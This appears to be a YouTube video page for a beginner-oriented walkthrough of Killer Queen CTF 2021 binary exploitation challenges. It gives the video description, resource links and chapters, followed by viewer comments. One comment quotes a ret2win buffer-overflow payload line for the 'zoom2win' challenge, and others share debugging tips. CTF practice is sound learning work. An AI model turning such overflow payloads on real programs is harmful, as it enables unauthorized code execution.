ฝัง
- เผยแพร่เมื่อ 17 ก.ค. 2024
- Video walkthrough for Binary Exploitation (pwn) challenges from the Killer Queen 2021 Capture The Flag (CTF). We'll cover integer overflows, python sandbox escapes (pyjail), ret2win buffer overflow, stack variable overwrite and canary leak/bypass (including some PwnTools tricks). "Killer Queen CTF is a free cybersecurity learning program and set of competitions available to all around the world. It specializes in developing a tutorial platform and hosting competitions geared at making cybersecurity education open to all in a free and fun environment". Write-ups/tutorials aimed at beginners - Hope you enjoy 🙂
↢Social Media↣
Twitter: / _cryptocat
GitHub: github.com/Crypto-Cat
HackTheBox: app.hackthebox.eu/profile/11897
LinkedIn: / cryptocat
Reddit: / _cryptocat23
TH-cam: / cryptocat23
Twitch: / cryptocat23
↢Killer Queen CTF↣
www.killerqueenctf.org/
2021.killerqueenctf.org/
/ discord
↢Resources↣
Ghidra: ghidra.re/CheatSheet.html
Volatility: github.com/volatilityfoundati...
PwnTools: github.com/Gallopsled/pwntool...
CyberChef: gchq.github.io/CyberChef/
DCode: www.dcode.fr/en
HackTricks: book.hacktricks.xyz/pentestin...
CTF Tools: github.com/apsdehal/awesome-ctf
Forensics: cugu.github.io/awesome-forens...
Decompile Code: www.decompiler.com/
Run Code: tio.run/
↢Chapters↣
Start: 0:00
Hammer To Fall: 0:16
I want to break free: 5:08
zoom2win: 11:47
A Kind of Magic: 30:06
TweetyBirb: 39:42
End: 50:26 - วิทยาศาสตร์และเทคโนโลยี
![DEADFACE Capture The Flag (CTF) 2021 - Challenge Walkthroughs [Beginner Friendly]](http://i.ytimg.com/vi/y8fmxealw8Y/mqdefault.jpg)
![DEADFACE Capture The Flag (CTF) 2021 - Challenge Walkthroughs [Beginner Friendly]](/img/tr.png)
![[TH] Esports World Cup : Grand Final](http://i.ytimg.com/vi/sedbKhFYDMo/mqdefault.jpg)
Audio is a little bit laggy/choppy at times, think the headset cable was loose 😑 hope it's bearable anyway ☺
I really admire the amount of effort you have put in this channel. You have inspired me to do something similar but in Greek.
I would like to thank you for this :)
There are many guys out there that find CTFs a gigantic ice age and this reduces their passion for cybersec. These videos are the absolute hands-on resources that can help them (and all of us of course) to learn how to approach CTF challenges and diving into the unknown.
thank you for the lovely feedback, appreciated! 🥰
That's love..pure love in these videos
🥰🥰🥰
Wow learn it alot! Thanks for doing the video! Audio was perfect for me
excellent! thanks 🥰
"Hang on, imma gonna crash" 😂
I can't remember which bit this is referring to specifically but it sounds about right 😂
Crisp and clear explaination...👏👌I thought you will also do the "brokencollegestudent" challenge. I got stuck in that only 😁
thanks mate 🥰 i really should of done brokencollegestudent, i ended up taking a look at some hack.lu challenges but they were hard 😆 worked on the new HTB machine "secret" in the end, it was really good, highly recommend!
@@_CryptoCat Thanks for the reply mate. Yeah..my team also did hack.lu challenges which were really tough according to them. But unfortunately I was not able to contribute due to some reasons and I will definitely try secret room from HTB🔥💯
@@Kartikeyj96can u suggest best resources for binary exploitation ..?
That's lit💥
😻
thanks for sharing the details of the hack. working perfectly fine with me
awesome! 🥰
Nice!
thanks mate 🥰
Nice bro. I quickly glanced your vids and didn't see one so just wondering...
How do you setup that PS1 bash prompt like that? So sick. Thanks!
thanks mate! the PS1 style is just the default for parrot OS, colours in terminal are: imgur.com/a/kcFR9id
@@_CryptoCat ohh! Thanks for the reply!
❤️👏
🥰🥰🥰
Try some challenges from Bsides Ahmadabad ctf
my team having been looking at some of them but im gonna try and get a couple of videos for the HTB x Synack CTF this weekend 🙂
🥰🥰🥰
for zoom2win when I do :
python2 -c 'print "A" *40 + "\x96\x11\x40\x00\x00\x00\x00\x00"' > payload
then run ./zoom2win < payload it doesn't give me the flag.txt I created
am I doing it wrong?
hmmm that looks correct to me 🤔 did you also try with pwntools script?
@@_CryptoCat yeah I tried it with the template as well and its the same thing, even on remote. I even did a for loop for the offset, and also done it with elf.symbols['flag'] but nothing seems to work
@@arsen3223 hmmmm that's strange, does the binary run ok on its own? have you done any buffer overflow challenges on this machine/VM before? what about if you just run the binary and enter like 60 "A"s, does it segfault as expected?
@@_CryptoCat it was an Ubuntu VM but I also have this issue on WSL. It's weird, I'll try it on my laptop later
@@arsen3223 cool, let me know! 😊
Great videos & tips.
37:34 - th-cam.com/video/FxNS-zSS7MQ/w-d-xo.html (LiveOverflow) - need to use sys.stdout instead.
finding the offset to overflow a variable - could also be done with viewing the stack layout (doubleclick on var name in IDA /Ghidra)
There's also a canary command in pwndbg to it's value and locations at runtime
wow thanks for the info! the canary command will be extremely useful 🔥